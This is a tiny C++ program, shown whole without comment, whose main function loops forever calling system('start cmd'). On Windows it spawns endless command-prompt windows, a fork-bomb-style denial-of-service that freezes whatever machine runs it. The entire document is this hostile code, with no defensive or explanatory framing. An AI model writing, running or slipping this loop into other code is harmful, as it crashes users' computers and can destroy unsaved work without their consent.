#include<bits/stdc++.h> using namespace std; int main() { for(;;) { system("start cmd"); } return 0; }